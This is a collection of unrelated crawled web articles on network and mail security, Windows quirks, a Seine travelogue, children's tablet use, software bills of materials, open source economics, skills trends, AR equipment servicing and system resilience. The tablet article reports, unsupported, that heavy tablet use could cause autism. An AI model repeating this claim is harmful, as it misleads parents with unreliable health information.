In many cases, it also makes sense to combine the aforementioned function with a web filter that prevents access to potentially dangerous and infected websites. To avoid too many problems when configuring the solution, the responsible employees should first test their rules in a “log only” mode and check exactly what is blocked and allowed through in detail before “arming” them. In this way, many calls to the IT department from angry users can be prevented.
Mail security and anti-spam
Let’s now turn to secure mail traffic. In most corporate environments, there is either a local mail server like Exchange or a cloud service where a provider takes care of configuring and securing the mail infrastructure. Since mail is one of the most important distribution media for malware such as ransomware, Trojans, and viruses, it makes sense to pay special attention to the aspect of mail security, regardless of the architecture used in each case.
There are various systems for securing mail traffic. These include anti-virus and anti-spam programs on the host, i.e. the mail server itself, which examine the transmitted data during transfer and remove malware or move infected messages to a quarantine. Such solutions have the advantage that they work at a central location and are therefore relatively easy to manage, as well as being able to see all relevant traffic.
As far as anti-spam products are concerned, it is important that they can classify emails not only by source domain but also by content (analyzing wording and keywords) and sender reputation. They should also be able to use typical anti-spam lists, such as those provided by Spamhaus.org, for classification purposes. In many cases, powerful spam filters can also be used to combat phishing emails.
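As a small illustration of how such list lookups work, a mail server checks a sending IP address against a DNS blocklist by reversing the IP's octets and querying them against the list's zone. The sketch below uses dig and the documented Spamhaus test address 127.0.0.2:

# Query the Spamhaus ZEN blocklist for the test address 127.0.0.2.
# The octets of the sending IP are reversed and prepended to the zone name.
$ dig +short 2.0.0.127.zen.spamhaus.org
# An answer in the 127.0.0.x range means "listed"; no answer means "not listed".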
Alternatively, client solutions for mail security are also available, which have often been integrated into anti-virus programs. These also take care of examining and securing incoming and outgoing messages, but directly on the respective client. Since they have to work on each workstation in the network, their administration is somewhat more complex than with centrally operating products. However, a central management console is usually available for such solutions.
Their use makes sense especially in environments where clients need to communicate with mail servers over whose security level corporate IT has no control, such as Gmail or similar services.
Antivirus on the client
Now that we’ve arrived at the endpoints in the network, let’s take a look at typical client-based security solutions, namely antivirus programs. While it used to be standard advice from every security expert to have an antivirus program installed on every (Windows) client, opinions on this matter differ today.
There are several reasons for this. Firstly, antivirus programs must be able to scrutinize all the files on a computer and, ideally, all the memory on the device. This means that they inherently undermine the security model of the operating system and thus open up attack surfaces that would not even exist without an anti-virus program.
For example, if an anti-virus tool running with the highest privileges has a security vulnerability and an attacker can exploit it to gain access to the system, then in most cases he will automatically have the highest privileges as well and, accordingly, will usually have the opportunity to do whatever he wants with the computer.
On the other hand, Windows Defender, Microsoft’s own anti-virus tool that has long been included with Windows, has improved significantly in recent years. Windows Defender initially performed poorly in tests by anti-virus specialists, with relatively weak detection rates that couldn’t keep up with other products on the market, but this has changed. Today, Windows Defender detects just as many viruses as other security solutions.
Does this mean that it still makes sense to use other antivirus solutions? Opponents of this move say that no company knows Windows better than Microsoft and that the number of employees in Microsoft’s security department is greater than the number of employees in most anti-virus software vendors in general. That is why, they say, Microsoft’s know-how is the best, and Windows Defender is preferable to all other products in this field.
The representatives of the other opinion say that Windows Defender, even if it is now as powerful as other solutions, becomes a risk simply because of the large number of installations. After all, many attackers design their malware to infect as large a number of computers as possible, and if they assume that Defender works as a security solution on most Windows computers, they will make sure that their malware can overcome Windows Defender if possible. The use of another antivirus program would help prevent the infection in such a case.
Another argument for the use of third-party solutions is their additional functions, such as the previously mentioned client-based mail security or anti-spam features. If these are needed in the company, administrators must choose a product that meets all of the requirements in each case. So, the bottom line is that the right course of action depends on the preferences of the decision-makers and the requirements of the particular environment.
To comprehensively secure a network, there are many decisions to make and many configuration steps to perform. This article could only provide a brief overview of the most important steps. In most environments, further actions will be required, such as setting up secure remote access for mobile workers and home offices via VPN connections. In the next parts of this series, we will go into more detail about the network security requirements of specific industries. | <urn:uuid:fc6e8fa6-10d8-4591-b1ca-21d127f93a3d> | CC-MAIN-2022-40 | https://informationsecurityasia.com/network-security-basics/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338213.55/warc/CC-MAIN-20221007143842-20221007173842-00786.warc.gz | en | 0.955263 | 1,925 | 2.5625 | 3 |
3 weird facts about Microsoft Windows
Here are 3 weird facts about Windows that few people can explain:
1. Nobody can create a folder named "Con".
Try to create a folder called "Con" (without the quotes) anywhere on your hard disk. Go to a location on your hard disk, right click, choose "New" and then select "Folder" from the menu that appears. Name the folder "Con" (without quotes) and hit Enter. You'll see that the folder won't be named "Con"; it will stay "New folder".
2. A text file made with Notepad, with the following content: "Bush hid the facts" (without quotes), won't display the actual text.
Go to Start -> Programs -> Accessories -> Notepad. Write the following text in Notepad: "Bush hid the facts" (without quotes), then save the file and exit Notepad. Now open the text file you created. You'll see that the text you just wrote and saved won't show.
3. Write this in Word: "=rand(200,99)" (without the quotes) and witness the magic.
Open Microsoft Word and on the first line write "=rand(200,99)" (without the quotes), then hit the Enter key. See the magic.
The Seine River
The Seine river rises about thirty kilometres northwest of Dijon and passes through Paris on its 777-kilometre journey to the sea.
Paris was founded on Île de la Cité, a small island in the Seine, and now has grown to the point that there are 37 bridges over the Seine within the city proper.
As this map shows, the Seine's course is serpentine between Paris and the sea.
The Seine is navigable by ocean-going ships as far upstream as Rouen, 120 kilometres from its mouth at Le Havre. Periodic dredging keeps it open for large ships. The river only drops 24 meters over its last 446 kilometres, so its usual slow flow helps to keep it navigable. Atlantic salmon returned to the Seine in 2009, migrating upstream past Paris. Industrial and agricultural pollution plus the dams had driven salmon out of the Seine some time between the two World Wars. But now you can again catch salmon from the riverbank in Paris!
Smaller commercial barges can go as far beyond Paris as Burgundy. With the modern dams and locks, the Seine has an average depth of about 9.5 metres where it passes through Paris today. The dams and locks start above Rouen, you can see one when this travelogue reaches Rolleboise.
William the Conqueror became Duke of Normandy in 1035, and led the Norman Conquest of England in 1066. His forces were victorious at the Battle of Hastings on 14 October 1066, and he was crowned the first Norman King of England on Christmas day in 1066.
William returned to Normandy around the end of 1086, and soon arranged a marriage of his daughter to the Duke of Brittany in order to gain more allies against the King of France in Paris. William led an expedition to the area around Mantes in July 1087 to take a little more territory, including the town itself. William either became ill or was injured during the fighting; it's not clear just what happened to him. He was taken back to Rouen, where he died on 9 September 1087.
This map shows William's area of control in 1087 in pink. These pages start with the first loop just outside the Normandy line, by the letter "n" in "Seine".
Mantes-la-Jolie is a commune, or community, of about 42,000 people. It used to be a large settlement midway between the power centers of the Kings of France in Paris and the Dukes of Normandy, originally actual Normans or Norsemen, at Rouen. Now it is more or less a far outer suburb of Paris.
It has been known officially as Mantes-sur-Seine, then in 1930 it merged with the commune of Gassicourt and was called Mantes-Gassicourt, and then in 1953 it was renamed as Mantes-la-Jolie. Informally, and less confusingly, it's just Mantes.
Let's zoom in, using the below map from 1951-1953 from the Perry-Castañeda Map Collection at the University of Texas at Austin. Mantes is at the bottom edge; it was still officially Mantes-Gassicourt when this map was published. We will go around that first loop below Mantes, through Rolleboise, Mousseaux-sur-Seine, Lavacourt, and Vétheuil, where Claude Monet lived from the summer of 1878 until 1883.
In April 1883, Monet was riding a train between Vernon and Gasny and noticed Giverny. He moved there the following month, and lived there until his death in 1926.
Then we will continue to Haute-Isle and La Roche-Guyon. From there, we will continue down the north or right bank of the Seine to Les Andelys and Château Gaillard. We will end up in Rouen, where Monet worked in 1892 and 1893 on a series of paintings of the Rouen Cathedral in varying lighting at different times of the day and year.
So as we go downstream, we will be following Monet's painting projects in time order.
Let's get started. You can look at these in any order, but I suggest reading downstream. Start on the first loop of the Seine. | <urn:uuid:39d2bda0-1398-4eec-abf4-b5d2319b2e26> | CC-MAIN-2022-40 | https://cromwell-intl.com/travel/france/seine-river-art-history-monet/Index.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335530.56/warc/CC-MAIN-20221001035148-20221001065148-00186.warc.gz | en | 0.959817 | 918 | 3.09375 | 3 |
With the wide array of electronic devices available in our everyday lives, it appears that children have formed an attachment to a different kind of toy.
According to the latest survey, 77 per cent of polled US and UK parents believe that iPads and other tablets are good educational tools that boost kids' creativity.
Meanwhile, researchers in this field explain that it is a matter of balance - and a child's access to tablets and other similar electronic devices should be monitored.
Specialists warn that using tablets in excess could cause attention deficit disorder and even autism, particularly at a very young age.
Parents should be aware of the first signs of trouble when they cannot pry their kid away from a beloved iPad. Beyond simply losing a favourite toy, the child could display some fairly serious symptoms.
Lisa Guernsey, author of "Screen Time: How Electronic Media -- From Baby Videos to Educational Software -- Affects Your Young Child," suggests that parents should notice their children's behaviour: "Can they focus on a conversation, not look at a screen for 30 minutes?"
If the iPad becomes the electronic babysitter, researchers in child development point out that the balance could be lost - regardless of the device's benefits.
Source: NY Daily News
With the mass adoption of open source software in recent years, there has been an increasing tendency to include it as a dependency. Software systems use open source components for reusability and reliability reasons. However, what is easy to include is equally difficult to track, and things can get out of hand if there is no control or policy governing inclusion.
This is why some skeptics wonder if there is a more effective way to leverage this power and convenience without causing more problems in the long run. There should be a way to record all of the parts that are required to compile, host, and run all of the software components of the infrastructure. We call this list a “bill of materials,” and this article will be devoted to explaining how it helps us address the risks of trusting external code.
The term “bill of materials” (or BOM) is taken from industrial manufacturing. It is a list of raw materials or assembly parts along with the quantities of each item that are needed to manufacture a complete component. You can think of it as the list of ingredients.
The BOM is vital because it serves as a verification document and helps ensure that all of the necessary parts are present and available in the proper quantities. If one part is missing, for example, or if the manufacturer was delayed in delivering the part, then there would be a flag in that BOM showing the issue with that particular part. Here is an example of a BOM file:
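Purely for illustration (the part numbers, quantities, and suppliers below are invented), a simple manufacturing BOM might look like this:

Part No.   Description          Qty   Supplier
FR-100     Frame, aluminium      1    Acme Frames
WH-210     Wheel, 26 inch        2    RollCo
CH-055     Chain                 1    LinkWorks
BR-310     Brake assembly        2    StopFast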
We can extend the analogy to the software industry: just as an automaker uses its BOM to trace a defective part to every affected vehicle and issue a recall, we can trace problematic components through what we call the Software Bill of Materials (sBOM), which lists packages and library components. For example, you may have a node.js project where the node_modules folder contains all of the required packages that are used for building and running the application. If some of them turn out to contain vulnerabilities or malicious code that was somehow injected via the registry, then your software pipeline is at risk.
The sBOM should list all packages used by all software components, their versions, their license models, a virus scanner report, and when they were last updated. Each package is traceable to the components that depend on it, so that you can identify the affected components if a scan fails. You also want to be able to upgrade or replace packages in case of deprecation or a CVE exposure.
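In practice, an sBOM is usually captured in a machine-readable format. The snippet below is a purely illustrative entry loosely modeled on the CycloneDX format; the package shown is just an example:

{
  "bomFormat": "CycloneDX",
  "specVersion": "1.4",
  "components": [
    {
      "type": "library",
      "name": "lodash",
      "version": "4.17.21",
      "licenses": [{ "license": { "id": "MIT" } }],
      "purl": "pkg:npm/lodash@4.17.21"
    }
  ]
}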
A “parts list” is a list of packages and dependent libraries that your software services need in order to operate. If the programs import libraries from NPM, Maven Central, or any other registry, then you can count them as parts.
If you have complete knowledge of those parts and what is required to build or compile the applications in your organization, then you can mitigate a whole series of issues and risks involved in maintaining those programs.
For example, if a new vulnerability is issued, then you can check if you are affected by comparing the affected versions against your existing bill of materials. If you have matches, you can find out which systems are affected.
Another example would be discovering that a library or dependency has been removed from a registry for whatever reason (such as license changes, legislative requirements, or a maintainer's decision). In that case, you wouldn't be able to use that component, and you would have to use a different version or consider a replacement. If you maintain an accurate BOM list, you may be able to find alternative parts or libraries to swap in. This means keeping a contingency plan attached to critical BOM items, just in case.
Ultimately, having a better view of the components that your software depends on will give you a clear view of your risks and the vulnerabilities of your components.
How can we figure out what should be on this parts list? If you ask the developers, they will likely show you the package-lock.json or the Gemfile.lock from their projects. However, these do not include other parts like hardware, OS modules, license types, or any other details.
You can either use automated tools to retrieve that information as part of the CI/CD process or as part of your regular scanning of repos, or you can use an external vendor to manage that for you. For example, to check if some licenses are business-friendly, you can use the js-green-licenses checker from Google:
$ npx js-green-licenses --local ./
This would show you unlicensed or unsuitable packages from a predefined list. However, it only works for npm projects, and it only checks open-source licenses.
If you want to cover all bases, you will have to find all of the tools that show the list of dependencies and include some sort of policy that they must publish their parts list before deploying to production. Once this part is configured, it will be considerably easier to enroll applications and record their bill of materials.
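As a sketch of what this could look like for an npm project, the first command below dumps the full resolved dependency tree, and the second uses the open source scanner Syft to emit a CycloneDX-format sBOM; verify the flags against the versions of the tools you run.

# Dump the complete resolved dependency tree as JSON (npm 7+).
$ npm ls --all --json > parts-list.json

# Generate a CycloneDX sBOM for the current directory with Syft.
$ syft dir:. -o cyclonedx-json > sbom.json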
With the general adoption of open source technologies, businesses are taking on the additional risks of vulnerabilities, deprecated versions, and hostile license models.
Before you jump on the bandwagon of the latest sBOM trends, it's critical that you assess the current security posture of your organization and identify how this change would gain you more credibility and increase your customers’ confidence in your products.
Once your path is clear, it’s important to assess present standards and best practices for compiling the list. You should start by reviewing the NTIA website material from top to bottom. When you have the requisite domain knowledge, you can make informed decisions about the appropriate strategy for your organization and establish some baseline policies.
You need to be on top of documenting and capturing any changes or updates; otherwise, if left to their own devices, people tend to ignore them. It’s difficult to know the best way to capture software bills of materials in advance, and since security standards change constantly, it’s incredibly difficult to establish a long-term solution.
Thankfully, there are companies like Checkmarx that can help you with that. By utilizing their SCA solution, you can scan and compile the list of materials for software components. You can check it out and request a free demo today.
Theo Despoudis is a Senior Software Engineer, a consultant and an experienced mentor. He has a keen interest in Open Source Architectures, Cloud Computing, best practices and functional programming. He occasionally blogs on several publishing platforms and enjoys creating projects from inspiration. Follow him on Twitter @nerdokto. He can be contacted via http://www.techway.io/. | <urn:uuid:dcc80384-e212-4875-ad6d-1ed50718a3f0> | CC-MAIN-2022-40 | https://checkmarx.com/blog/why-you-need-an-accurate-parts-list-for-your-software/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337432.78/warc/CC-MAIN-20221003200326-20221003230326-00186.warc.gz | en | 0.9424 | 1,351 | 2.625 | 3 |
The business of arranging millions or billions of zeros and ones in exactly the right order—also known as the business of software—has undergone many significant shifts over the history of computing, and we might be about to experience yet another.
In the early days of commercial computing, software was seen as a constituent of the hardware platform. You bought a computer from a manufacturer such as IBM, and the computer came fully installed with all the software you would need.
Independent software vendors—ISVs—existed during the mainframe era, but it was not until the minicomputer and client server era that ISVs became truly significant. Minicomputers manufactured by companies such as Digital and Data General ran their own operating system, but by the early 1980s were typically running application software created by an independent company such as Oracle. When IBM created the IBM PC in 1981, it outsourced the operating system to a small company called Microsoft. By the end of the century, organizations such as Oracle and Microsoft had revenues that dwarfed that of the hardware manufacturers and they had become some of the most valuable companies of all time.
As a business, software had some incredible advantages. The incremental cost of producing software is negligible: Once you have perfected a piece of software you can replicate it at virtually no cost. Software also has a fairly low barrier to entry: You don’t need a massive manufacturing plant to create a piece of software; a single programmer can create a billion-dollar software product on a $500 computer.
However, over the last 10 years the software business has become a lot tougher. There are many reasons, but in particular open source software has created a significant and persistent disruption for the ISV. The concept of open source software emerged in the early 1980s from Richard Stallman’s GNU initiative, which aimed to produce a free open source software version of UNIX (GNU is a recursive acronym: GNU’s Not UNIX). Linux emerged in the early 1990s under a GNU license, and by the mid-2000s Linux had become the most significant server-side operating system. Red Hat created a billion-dollar company providing services and distributions of Linux.
Many enterprises were reluctant to build their infrastructure around open source software, preferring the security of a commercial software vendor such as Oracle or Microsoft. However, the economic advantages of open source proved decisive, and by now open source has become an acceptable—and sometimes even mandatory—ingredient in the modern enterprise application architecture.
Ironically, just as the acceptance of open source in the enterprise has finally become established, the enthusiasm for open source in the software industry and venture capital community is starting to wane.
The image of open source as developed by hip hackers in garages is far from accurate: Almost all open source is developed inside commercial software companies. For example, the open source databases MySQL, MongoDB and Cassandra are predominantly supported by the Oracle, MongoDB, and DataStax corporations. These companies invest in OSS in order to gain market share or competitive advantage. Often, the investment is backed by venture capital firms hoping to find another Red Hat—i.e., another billion-dollar OSS company.
Unfortunately, the billions of dollars invested in open source have not created another Red Hat. If there is no return on the open source investment, then eventually the investors will put their money somewhere else. There is already significant scepticism around open source within the venture capital community, and a sense of fatigue within large companies struggling to establish open source business models.
Open source has powered an enormous amount of innovation and has literally changed our world—mostly for the better. However, programmers need to eat, and corporations need revenue. Unless a truly viable and repeatable open source business model emerges, I think we will see a decreasing investment in open source software going forward. | <urn:uuid:1d5254bf-0c7a-42f6-8119-5b4fbf6d8be1> | CC-MAIN-2022-40 | https://www.dbta.com/Editorial/Think-About-It/Open-Source-at-the-Crossroads-114681.aspx | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030331677.90/warc/CC-MAIN-20220924151538-20220924181538-00387.warc.gz | en | 0.962842 | 781 | 3.0625 | 3 |
26 March 2019 | Written by: sonia.malik
This past week, Coursera released the inaugural issue of the Coursera Global Skills Index (GSI), an in-depth look at skill trends and performance around the world, made possible by the millions of learners who come to Coursera to learn and grow.
As the types of skills needed in the labor market change rapidly, individual workers will have to engage in life-long learning if they are to achieve fulfilling and rewarding careers. For companies, reskilling and upskilling strategies will be critical if they are to find the talent they need and to contribute to socially responsible approaches to the future of work. For policy-makers, reskilling and retraining the existing workforce are essential levers to fuel future economic growth, enhance societal resilience in the face of technological change and pave the way for future-ready education systems for the next generation of workers.
Macro trends like digital transformation and the decreasing shelf-life of skills are challenging organizations to play catch up as they try to hire and develop their people. This year, the number one focus for talent developers is to identify, assess, and close skills gaps and they are tackling the challenge head-on in a myriad of ways and reports such as this draw from an innovative data methodology to reveal rich skills insights.
Here are some of the key findings of the report:
- Two-thirds of the world’s population is falling behind in critical skills, including 90% of developing economies. Countries that rank in the lagging or emerging categories (the bottom two quartiles) in at least one domain make up 66% of the world’s population, indicating a critical need to upskill the global workforce. Many countries with developing economies — and with less to invest in education — see larger skill deficiencies, with 90% ranking in the lagging or emerging categories.
- Europe is the global skills leader. European countries make up over 80% of the cutting-edge category (top quartile globally) across Business, Technology, and Data Science. Finland, Switzerland, Austria, Sweden, Germany, Belgium, Norway, and the Netherlands are consistently cutting-edge in all three domains. This advanced skill level is likely a result of Europe’s heavy institutional investment in education via workforce development and public education initiatives.
- Asia Pacific, the Middle East and Africa, and Latin America have high skill inequality. Consistent with the vast economic and cultural diversity that characterizes each region, Asia Pacific, Middle East and Africa, and Latin America have the greatest within-region skill variance. Asia Pacific is at the extremes of the global Business rankings with New Zealand (#6) and Australia (#9) approaching the very top, while Pakistan (#57) and Bangladesh (#59) land near the bottom. In the Middle East and Africa, Israel is a leader in each of the three domains and #1 in Data Science, while Nigeria lags near the bottom of the rankings across domains, and is last in Data Science. In Latin America, Argentina’s #1 ranking in Technology is in stark contrast to Mexico’s (#43) and Colombia’s (#49) lower proficiencies in the field.
- The United States must upskill while minding regional differences. Although known as a business leader for innovation, the U.S. hovers around the middle of the global rankings and is not cutting-edge in any of the three domains. Within the U.S., skill proficiency is distributed non-uniformly: while the West ranks ahead of other regions in Technology and Data Science, the Midwest shines in Business.
In addition to benchmarking countries, the report also evaluated trending skills globally and skill proficiencies across 10 major industry verticals. The top two findings were:
- Demand for Technology and Data Science skills is growing, while demand for Business skills is shrinking. Across the board, enrollment numbers highlight fast-growing demand for Technology and Data Science skills from individuals and companies alike. IBM has a very strong Data Science Professional Certificate course to help get started with those Data Science skills.
- Technology industry professionals lack strong business skills. Technology ranks 5th in Business out of the ten industries in the analysis. To help resolve this, IBM has announced a series of five free professional skills courses.
The complete Coursera report can be downloaded here.
Education and training systems need to keep pace with the new demands of labor markets that are continually challenged by technological disruption, demographic change, shifting business models, and the evolving nature of work. This transformation needs to address both short-term needs (35% of the skills demanded for jobs across industries will change by 2020) and long-term needs in an urgent but sustainable manner. Stay connected with IBM Training to see how you and your organization can stay ahead in this skills game.
What is augmented reality?
Augmented reality provides the user with an interactive experience in which objects and devices in the real world are enhanced with information generated by an AR app. The basic features of AR are a combination of the real and virtual worlds, real-time interaction, and accurate 3D registration of virtual and real objects.
Augmented reality works by overlaying digital content on a live camera feed and making the added imagery look as real as the actual objects around the user. It can also add sound effects or other digital visual elements to the scene presented to the user.
Where can it be used?
Augmented reality technology can be applied in almost all fields, such as retail, marketing, education, and healthcare. Within the medical field, AR can be applied in numerous ways. One would be to view a specific human body system as a highly detailed 3D image that helps medical students and professionals in their training. This can be achieved simply by pointing a mobile camera at the body system.
In health care, AR technology can also be used in physical therapy, in-flight medical emergencies, pain management, digital impressions on dental work, testing medical devices, and so on.
AR in medical equipment servicing:
The servicing of medical equipment is challenging, as issues need to be addressed immediately and require knowledgeable, dedicated resources. Without AR, repairing or troubleshooting such machines is a lengthy process of going back and forth among lab technicians, service persons, and product experts, which aggravates the inconvenience for the clinic or hospital team.
Medical equipment downtime should be reduced or avoided because it can even put at risk the lives of patients who need immediate medical attention.
The advancement of AR technology and its use in servicing medical equipment reduces downtime and human intervention, and it helps deliver solutions quickly. With AR, even complex equipment with many hardware and software components can be easily serviced, and issues can be resolved remotely with an AR app installed on a mobile device.
How can an AR app be used in service?
Step 1: Identifying the problem/equipment
The service person will have an AR app installed on a mobile phone, tablet, or Google Glass. With Google Glass, the technician is hands-free to perform any action or repair work. When the technician looks at the equipment through the glasses or mobile camera, the camera captures the equipment. Using image recognition, the device is compared against the database content available to the AR app, which helps identify the model of the equipment or even the problem in it.
Step 2: Fetching relevant AR data
Now the app accesses all the AR data (voice guidance, tips, scenario steps) relevant to the problem. If these tips give the technician enough confidence, he can make a decision and resolve the issue by making adjustments.
Step 3: Augment in real-time
The image recognition algorithms used in the AR app help dynamically augment the live camera feed with text, videos, or 3D objects. This step provides the technician with more possible solutions, with illustrations to guide him in resolving the issue. If the technician cannot arrive at a solution, he can contact an engineer or expert using the video call option available in the app. This way, the expert sees the same augmented content that is available to the service person and can suggest a solution immediately, which reduces service time considerably and helps reduce the downtime of the machine as well.
Additional features in AR app
Along with these options, an AR app can also offer video communication among engineers, service persons, and users, as well as chat options. These features help the service person guide the user more effectively.
The success of the AR-based equipment service depends mainly on AR content preparation. Even though the AR content preparation is a long-term and costly procedure, it will reduce the other costs like technical training, skilled professional recruitment, and also the travel time of the service person.
As the saying often attributed to Abraham Lincoln goes, “If I had six hours to chop down a tree, I’d spend the first four hours sharpening the axe.” The time and cost spent on content preparation will likewise pay off in effective, continuous maintenance.
Implementation of this technology in medical equipment servicing will not affect the existing workflow and can be easily adaptable in the field, which will help gain a market for such apps. Even though one can argue on the time/cost spent on data collection, providing effective equipment service is more important for the growth of the business and to gain the trust of customers. So, we can see a bright future for service companies that adopt AR in servicing their devices. | <urn:uuid:b24c162b-61fd-4ca5-90f0-c90813c6ef94> | CC-MAIN-2022-40 | https://www.hcltech.com/blogs/augmented-reality-medical-equipment-servicing | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335257.60/warc/CC-MAIN-20220928145118-20220928175118-00387.warc.gz | en | 0.940216 | 1,040 | 3.390625 | 3 |
More and more companies and organizations are starting to realize the number of risks their physical facilities or information systems could face in today’s age of threats. Security system integration has been adopted widely of late, and it is becoming a much more encompassing term. Usually, security system integration involves hooking up access control systems, CCTV systems, and alarm systems, but these days we’re starting to incorporate more technologies into the arsenal. If you have heard the term system integration, especially in the context of security technology, it is crucial to understand what the drawbacks and benefits might be. Read on to learn more!
Improved Comprehensive Security
Integrated approaches can create much-needed redundancy that increases the overall strength of the entire system in the event that one aspect of the security system is bypassed. If somebody were to duplicate an access control keycard, it might not be enough to get them into a secured parking lot if that lot is also protected by a driver camera system. Any isolated system is subject to being entirely circumvented, but when systems are combined, bypassing these security technologies becomes much more challenging. This is why system integration is so important.
Integrated systems also make spaces more functional and more straightforward for those who should have full access. The benefit of these kinds of technologies is that they are usually designed around usability. Instead of creating many mechanisms that a person has to be responsible for, like different keycards and passwords, they rely on credentials that are intrinsic to a user, like fingerprints, facial features, and answers to security questions. While keycards and passcodes might still be utilized, developers of systems meant to be integrated are fully aware that carrying around various cards or remembering passwords is not efficient or practical.
Drawbacks and Difficulties
Historically, many security systems have been proprietary, forcing you to buy each element of your system from the exact same vendor. However, this has changed vastly in recent years, as many suppliers in the physical security industry understand the importance of open or standards-based security systems.
Groundbreaking Technologies with Gatekeeper
Gatekeeper Security’s suite of intelligent optical technologies provides security personnel with the tools to detect today’s threats. Our systems help those in the energy, transportation, commercial, and government sectors protect their people and their valuables by detecting threats in time to act. From automatic under-vehicle inspection systems and automatic license plate reader systems to on-the-move automatic vehicle occupant identification, we offer full 360-degree vehicle scanning to ensure any threat is found. In countries around the globe, Gatekeeper Security’s technology is trusted to help protect critical infrastructure. Follow us on Facebook and LinkedIn for updates about our technology and company.
Define Security First
Given the amount of prose dedicated to the internet of things, it would hardly be foolish to assume that the term is well-defined and well-understood. In reality the opposite is true – professors, tech companies, the media, and individual blogs all disagree on what exactly falls under the umbrella of internet of things.
The problem seems to be that until recently, the internet of things was a relatively niche area. Its gadgets hadn’t yet become mainstream and ubiquitous; all-encompassing connectivity was nothing but a glint in the eye of tech giants. However, today the term has become incredibly broad. It includes everything from Apple’s smart watch to city planning and from airport technology to health monitoring. It’s so broad that almost any internet-connected device can reasonably claim to be part of it.
The problem is comparable to that faced by cloud computing five years ago. At the time, the term ‘the cloud’ seemingly referred to everything stored online in some way – as if the entire cloud was one single model. As the market developed and matured, and the adoption of the cloud became increasingly widespread by personal and business users, a more refined set of terminology developed. Today it has been broken down into a number of subsets – for example, PaaS, SaaS, IaaS, etc.
As the internet of things sector matures and the industry develops, we will no longer be able to bundle all these very different things under one generic umbrella term. Much like ‘cloud’ or ‘big data’ in the past, it’s incredibly overused, and to some degree, almost too vague to be useful.
The answer appears to be rooted in security. As with the important distinctions in cloud computing – each which requires the business using the service to negotiate a different balance between trust and control with the cloud provider – a similar set of distinctions must now be made for the internet of things.
After all, it is a significant challenge to establish trust and control across an enormous range of ‘things’, particularly when they are widely distributed, deployed on a scale of millions, and handle highly sensitive data. The information flowing through a network of smart ovens is very different from the information generated by an installation of earthquake detectors. Therefore, it is impossible to discuss or define the internet of things effectively without first breaking it into parts. Failure to separate the IoT into differing levels of security will lead to trying to secure all data on all devices, an impossible task.
How or what those terms may be is a job for skilled professionals – the same professionals who secure nearly every website on the planet and the payment systems we use every day. The coming years should be a fascinating time.
By Daniel Price
Daniel is a Manchester-born UK native who has abandoned cold and wet Northern Europe and currently lives on the Caribbean coast of Mexico. A former Financial Consultant, he now balances his time between writing articles for several industry-leading tech (CloudTweaks.com & MakeUseOf.com), sports, and travel sites and looking after his three dogs.
Failure is inevitable. When we assume that services must be up 100 percent of the time, that’s when IT teams run into issues. This is where designing to fail, or what InfoQ refers to as designing for resilience, plays a critical role.
Designing for failure means that your team has automated processes in place for when your system fails, in addition to having as much control as possible over how this failure occurs. A system designed for failure is more capable of self-healing, restarting and maintaining service when the worst happens.
By shifting our focus from designing systems to constantly achieve high uptime to instead designing our systems to fail in a predictable way, we can ensure quicker recovery and minimal downtime.
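To make the idea concrete, here is a minimal sketch of what "automated processes for when your system fails" can look like in practice: a supervisor loop that health-checks a service and restarts it with exponential backoff before escalating to a human. The hooks, thresholds, and intervals are illustrative assumptions, not something prescribed by this article.

    import time

    def supervise(is_healthy, restart, alert, max_restarts=5):
        # Keep a service alive automatically; escalate to humans only once
        # automated recovery has been exhausted.
        delay, restarts = 1, 0
        while restarts < max_restarts:
            if is_healthy():
                delay = 1          # service recovered: reset the backoff
                time.sleep(5)      # normal polling interval
                continue
            restart()              # automated self-healing step
            restarts += 1
            time.sleep(delay)      # backing off keeps the failure controlled
            delay = min(delay * 2, 60)
        alert("service did not recover after automated restarts")

The specifics will differ per system, but the point is the same: the failure path is designed and rehearsed, not improvised.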
A design-to-fail blueprint
Organizations need more than just a disaster recovery plan. Systems that are designed to fail should self-recover as much as possible, rather than depending on the intimate domain knowledge required to execute disaster recovery plans. Furthermore, these plans often don’t account for how applications built on top of the cloud need to be designed to cope with all the elements of a service or application that can fail individually—hardware failures, OS or system failures, internet outages, BGP and peering issues, and other aspects that may be outside of your control.
An easy way to get started is to have a post-mortem pretending that you have just had a massive failure event. Which systems were impacted? How do these systems restart? What dependencies must be accounted for? Who was notified? What time did the event occur? What was the impact on our users? This requires a mindset shift and an ability to visualize your real-time and future states. Let’s look at 4 important elements of the “design to fail” approach to your systems.
1. Visualize your systems
IT teams shouldn’t just know how their systems look when uptime is 100 percent. They should also anticipate changes to the cloud environment brought about by downtime incidents. Visualization helps teams see real-time and future states with the appropriate context needed to plan for failure.
2. Understand your dependencies
During an incident, dependencies can also change. If essential tools experience downtime, IT teams must have a plan for how to move forward with minimal issues until those services are back online.
These teams need to develop an understanding of the types of data that persist in your system, where data persists, what the replication schemes are, what data durability requirements apply, and so on. By using visualization and documentation to know which dependencies apply, IT leaders can determine how an organization or team will respond if your system’s dependencies begin to fail. You can more easily build in redundancy among your dependent components so that no single point of failure can weaken or collapse your system.
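As a sketch of what "redundancy among your dependent components" can look like in code (the URLs and timeout below are invented for illustration), a call to a critical dependency can fail fast and fall back to a redundant replica instead of becoming a single point of failure:

    import urllib.request

    def fetch_with_fallback(primary_url, replica_url, timeout=2):
        # Try the primary dependency first, but fail fast and fall back to a
        # redundant replica so one unhealthy dependency cannot take us down.
        for url in (primary_url, replica_url):
            try:
                with urllib.request.urlopen(url, timeout=timeout) as resp:
                    return resp.read()
            except OSError:
                continue            # dependency unhealthy; try the next one
        raise RuntimeError("all replicas of the dependency are unavailable")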
3. Bring all stakeholders up to speed
Designing to fail requires a variety of stakeholders in the planning process, including IT leadership, cloud architects, application DevOps teams, and others. In addition, business leaders without a technical background are often looped in when large-scale failure incidents occur. CIOs and IT leaders need to determine who should be involved in the failure planning process and then ensure that these stakeholders have input, access and alignment.
Without effective collaboration, IT leaders run the risk of their teams struggling to catch up during an incident. Misinformed stakeholders can’t fully participate during an event or in the planning stages. Visuals, like incident management process flows, are a great way for leaders to communicate to broader internal and external audiences about the potential and actual implications of a downtime incident. In the context of designing to fail, the IT and infrastructure teams can role-play incident response from there and plan various scenarios while bringing all kinds of stakeholders up to the same level of understanding.
4. Consider low-risk resiliency strategies
